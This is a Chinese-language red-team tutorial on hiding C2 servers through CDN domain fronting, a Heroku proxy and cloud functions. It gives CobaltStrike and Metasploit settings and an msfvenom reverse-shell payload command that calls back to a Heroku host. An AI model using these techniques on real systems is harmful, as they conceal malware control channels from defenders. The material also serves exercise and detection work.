c2服务器（红队攻防基础建设）

前记随着HW的开始，蓝队弟弟们见识到了很多奇特的操作，本文主要从监测溯源时比较常见的一些红队的隐匿手法进行讲解。在实际攻防中有效的隐匿我们的C2主机也是很必要的，在工作的同时发现很多蓝队对此并不熟悉，所以本文会深入浅出的讲解三种常见的方式，希望通过本文能够对各位有所帮助。域前置域前置技术就是通过CDN节点将流量转发到真实的C2服务器，其中CDN节点ip通过识别请求的Host头进行流量转发。这里作者利用阿里云全站加速CDN实现任意HOST头修改，利用构造高信誉域名，从而实现绕过流量分析。第一步访问阿里云 CDN 全站加速配置，如下图：点击添加域名，，填写CDN基本信息，加速域名处可以填写高信誉的域名，在国内绝大数的服务商，都需要验证主域名的归属，但是在阿里云全站加速CDN中只要IP是本用户阿里云的主机即可绕过验证。只需要填写加速域名以及IP即可完成配置，搭配CobaltStrike profile即可绕过达到隐蔽真实IP及Header的功能，进行隐蔽IP的功能。如上图即填写完毕，之后等待CDN配置完毕即可正常使用。第二步使用多地ping对CNAME进行检测，得到多地CDN的IP。全网PING:http://ping.chinaz.com/这里使用用三个演示效果即可。 58.215.145.10561.168.100.17542.48.120.160第三步使用得到的IP，进入CobaltStrike，配置profile文件。这边使用的profile是amazon.profile，其实也可以自己写。 下载地址:https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile修改三处，header “Host” 即可。第四步开启CobaltStrike，开启命令: ./teamserver xxx.xxx.xxx.xxx password amazon.profile进入CobaltStrike进行配置，监听器配置如下：配置HTTPS Hosts为之前获取的CDN IP，HTTP Host(Stager)为nanci.tencent.com，也就是我们配置的加速域名，端口默认80即可。然后开启监听器，生成木马。 发现成功上线并且使用netstat可以看到我们的网络连接为之前的两个负载IP如上图可以看到数据包的Host为nanci.tencent.com 至此域前置成功部署！总结配置简单延展性强，可以随时更换IP，在红蓝对抗时可以快速部署，增加了防守封禁IP的难度。Host高信誉域名。注意阿里云不支持https的域前置缺点：对CDN资源较大，不建议长时间使用（土豪除外）。 在前几天微步公开的情报中，提到了这一种攻击方式，所以作者在这里剖析了域前置的利用方式，希望能够对蓝方成员监控时有所帮助。Heroku代理隐匿真实IPHeroku是一个支持多种编程语言的云平台即服务。简单理解就是可以免费部署docker容器并且可以开放web服务到互联网.下面介绍操作步骤。其实简单来理解应用在C2隐匿上就是通过Nginx反向代理的方式，从heroku服务器代理到我们真实的VPS服务器。Heroku在CobaltStrike中的应用第一步 注册heroku账号，这里需要注意的是需要使用gmail邮箱注册，因为QQ以及163等国内邮件服务商被禁用，无法完成注册。注册网址：https://dashboard.heroku.com/第二步 注册成功后进行登录，访问以下网址进入配置页面。https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku这里主要需要的是箭头所指的两处，其中App name为子域名前缀的名称，这里我们可以自定义，只要没有被注册过不重复即可。而TARGET处，填写为我们真实的VPS服务器的域名，也就是需要代理的主机域名。这里格式为:https://baidu.com:8443，代理VPS的8443端口。填写完毕后点击Deploy app自动部署。如上图所示即配置成功。第三步在Cobaltstrike中配置两个监听器，设置PAYLOAD为Beacon HTTPS，HTTPS Hosts为sict.icu也就是我们真实的域名，HTTPS Port为8443端口。监听器1如下图所示:继续配置第二个监听器，同样设置PAYLOAD为Beacon HTTPS，HTTPS Hosts设置为nancicdn.herokuapp.com，也就是之前获取到的heroku的域名。其中部署时配置的App name为子域名前缀，所以最终得到的heroku的域名就是nancicdn.herokuapp.com。HTTPS Port设置为443。 监听器2如下图所示：监听器全部部署完毕后生成木马文件，注意生成木马的监听器设置为监听器2，也就是指向heroku域名的那一个监听器。成功上线CobaltstrikeHeroku在Metasploit中的应用heroku服务的配置这里就不再赘述，直接从Metasploit的配置开始讲解。第一步打开msf在metasploit中添加handler,配置如图：使用模块payload/windows/x64/meterpreter_reverse_https设置LHOST为我们实际指向的域名，LPORT为8443，是在heroku中配置的。然后设置三个全局参数，如下：setg OverrideLHOST nancicdn.herokuapp.comsetg OverrideLPORT 443setg OverrideRequestHost trueOverrideLHOST为我们heroku的地址，后面主域名为固定的，子域名前缀为刚才heroku中配置的App name。端口为443因为我们配置的是https协议。参数配置完毕后，输入to_handler开启监听。如上图可以看到已经开启8443端口的监听，即配置完毕。第二步使用命令生成木马msfvenom -p windows/x64/meterpreter_reverse_https LHOST=nancicdn.herokuapp.com LPORT=443 -f exe -o payload.exe然后将生成的木马上传至虚拟机并执行。 执行后发现在metasploit成功上线。可以看到session的链接地址为heroku中转服务器地址，而且不同的heroku部署其连接的IP是不相同的。 如下图：Target 1Target 2总结heroku隐藏C2从技术原理上看非常简单,使用heroku服务部署nginx反向代理服务,payload连接heroku的nginx,nginx将流量转发到C2。具体优势如下:只需要注册heroku免费账号即可无需注册或购买域名自带可信的SSL证书(heroku域名自带证书)如果IP地址被封锁,可删除原有heroku app重新部署heroku app(大约需要30s),与防守人员持续对抗操作步骤简单云函数这个技术最先是在今年的3月份国外提出的，他们利用 azure 对 C2 进行隐藏，国内也有相对应的 云函数厂商，于是我们就尝试使用云函数对我们的 C2 服务器进行隐藏。配置过程点击新建云函数，选择创建方式—自定义创建，函数名称自定义或者默认都可以，运行环境选择python3.6，当然也有师傅去用其他语言版本去写但是原理都是一样的，地域随意即可。点击完成，我们先不编辑云函数代码。创建触发器，具体配置如上图，我们使用API网关来进行触发函数。按照上例图片配置一下API网关的默认路径，然后选择立即完成并发布任务即可。然后我们编辑一下云函数，注意修改C2变量的内容为自己ip即可。下面的使用x-forward-for来确认目标主机的真实ip，不配置的话不影响正常使用，但是上线主机的ip会是云函数主机的IP地址。这里配置完成后，我们得到API网关地址如下图：注意发布然后我们开始配置CS客户端，创建一个监听器，配置如下图，把API网关地址复制进去，注意端口必须设置为80，如果想要设置为其他的还需要配置一下云函数。设置profile文件启动，配置文件http-config设置如下：这里是为了与上面的云函数同步使用X-Forward-For来获取真实ip然后我们生成木马进行上线。成功上线！下面我们来分析一下木马程序，首先查看本地外联ip为腾讯云IP地址发现是腾讯云主机继续分析上传病毒样本至微步平台(这也是蓝队成员最常用的分析手段)可以看到只能捕获到API网关域名。总结云函数的好处就是配置简单，免费，高效，很适合日常渗透使用。嘿嘿，写到最后就不太想凑字数了。后记本文到这里就接近尾声了，正值HW时期，希望以本文能够对广大防守方成员有所帮助，面对红队的隐匿技术，在工作中碰到这种问题可以第一时间进行响应研判，当然以上的几种方式都不太好溯源，这也是时至今日这些方法依旧有效的原因，尤其是今年的HW中，这些方式更加频繁的映入我们的眼帘。今年不仅仅是大量的0day爆出，也有一些奇淫巧计的产生，在检验企业安全体系能力的同时也在磨练红蓝双方人员的实力，这也是红蓝对抗的意义所在。